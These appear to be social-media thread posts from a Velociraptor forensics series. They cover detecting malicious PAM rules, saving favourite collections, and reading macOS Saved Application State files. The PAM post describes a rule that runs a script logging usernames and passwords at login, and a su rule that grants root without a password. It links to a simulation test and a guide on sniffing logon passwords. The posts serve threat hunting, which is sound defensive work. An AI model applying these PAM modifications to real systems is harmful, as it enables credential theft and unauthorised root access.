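Note that 'auth required pam_permit.so' in common-auth is left alone: on Debian-derived systems it is the normal landing point after the '[success=1 default=ignore]' jump, so flagging pam_permit only when it is 'sufficient' keeps the noise down across a fleet.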
----
Here (results image), we can see an entry in '/etc/pam.d/common-auth' that executes a script called 'toomanysecrets.sh' upon user login👀. Aside from that, there is also an entry in '/etc/pam.d/su-l' for 'pam_succeed_if' that appears to allow any user to escalate to root without the password🥴!
----
For example, executing the command 'su -l root' as 'pbeesly' allows for root access without prompting for a password.
----
If we look at the contents of 'toomanysecrets.sh', it appears to write to a log file called '/var/log/toomanysecrets.log'.
If we look at the content of the log file, we see...usernames...and...passwords! 😵💫
----
Based on what we've found, we can see how useful it can be to have the ability to search the PAM configuration for anomalies, especially across many hosts.
Overall, we can quickly glean the following information from this artifact:
- Last modified time
- File path
- Command
----
If you would like to simulate this activity yourself, try out the Atomic Red Team test below!
https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.003/T1556.003.md#atomic-test-1---malicious-pam-rule
If you would like to learn more about how PAM can be abused to gather usernames and passwords at login, check out the following link!
https://book.hacktricks.xyz/linux-hardening/linux-post-exploitation#sniffing-logon-passwords-with-pam
----
That's it for now! Stay tuned to learn about more artifacts! 🦖
Also, check out the MITRE ATT&CK page for 'Modify Authentication Process: Pluggable Authentication Modules' below!
https://attack.mitre.org/techniques/T1556/003/
#velociraptor #artifactsofautumn #dfir #forensics #infosec #linux #t1556 #threathunting
🦖Day 76 of the @velocidex #velociraptor #ArtifactsOfAutumn series
Artifact: Server.Utils.SaveFavoriteFlow
Link: https://docs.velociraptor.app/artifact_references/pages/server.utils.savefavoriteflow/
----
Did you know you can save your favorite Velociraptor collections?
It may take a bit of effort to set up and configure an ideal combination of parameters and artifacts within a collection.
This artifact allows the user to save a collection to a 'Favorites' section, for later use.
----
This artifact is typically called by clicking the icon from the "collected" page for a client.
However, this artifact could also be called via the Velociraptor API, or another artifact.
----
Once the 'Save Collection' button/icon has been clicked, a prompt will appear in which users can enter details about the collection.
----
Once saved, the collection can be selected for use.
Simply click the💙icon in the upper right-hand corner of the collection UI to select your favorite collection.
----
After clicking the desired collection, the associated artifacts will be displayed, and the collection can be launched.
----
If you decide you would like to delete a saved collection, you can do so by clicking the trash can icon when a saved collection is selected.
----
That's it for now! Stay tuned to learn about more artifacts! 🦖
#velociraptor #artifactsofautumn #dfir #forensics #infosec #threathunting
🦖Day 75 of the @velocidex #velociraptor #ArtifactsOfAutumn series
Artifact: Exchange.MacOS.Applications.SavedState
Link: https://docs.velociraptor.app/exchange/artifacts/pages/macos.applications.savedstate
----
On macOS, certain application state is stored in '/Users/*/Library/Saved Application State/'.
We can check these files to determine the last time an application was opened, the title of the application window, and when the app/window was later restored (login/reboot).
----
In general, the following has been observed with regard to saved state files:
- The ‘SavedState’ files are created when the application is started.
- SavedState directory - Btime - Last time the application was opened by the user.
- SavedState directory - ModTime - When the application state was last restored (such as after login/reboot).
- .data files - the actual data within the app, such as the scrollback for a Terminal window. The data within can be an (AES-128-CBC) encrypted blob. This data can be decrypted using the appropriate NSDataKey value found in windows.plist.
- windows.plist – contains the name of application windows (NSTitle), and data like:
- NSDataKey - Enc key
- NSDockMenu.name – names respective to the user’s dock/etc.
- NSWindowID – can be used to link the NSDataKey to the PersistentUIRecord value in the .data file(s).
----
The information provided by this artifact includes:
- Birth time and modification time of each file
- File name and path
- Dock menu name (where applicable)
- Window title (where applicable)
- Window details (other data, such as enc key and reference to .data file)
----
There's a bit to unpack there, but the articles in the links below should provide more of a walkthrough around Saved Application State in macOS.
Thanks, @crowdstrike and @twsecblog !
https://www.crowdstrike.com/blog/reconstructing-command-line-activity-on-macos/
https://www.sans.org/blog/osx-lion-user-interface-preservation-analysis/
----
That's it for now! Stay tuned to learn about more artifacts! 🦖
#velociraptor #artifactsofautumn #dfir #forensics #infosec #macos #threathunting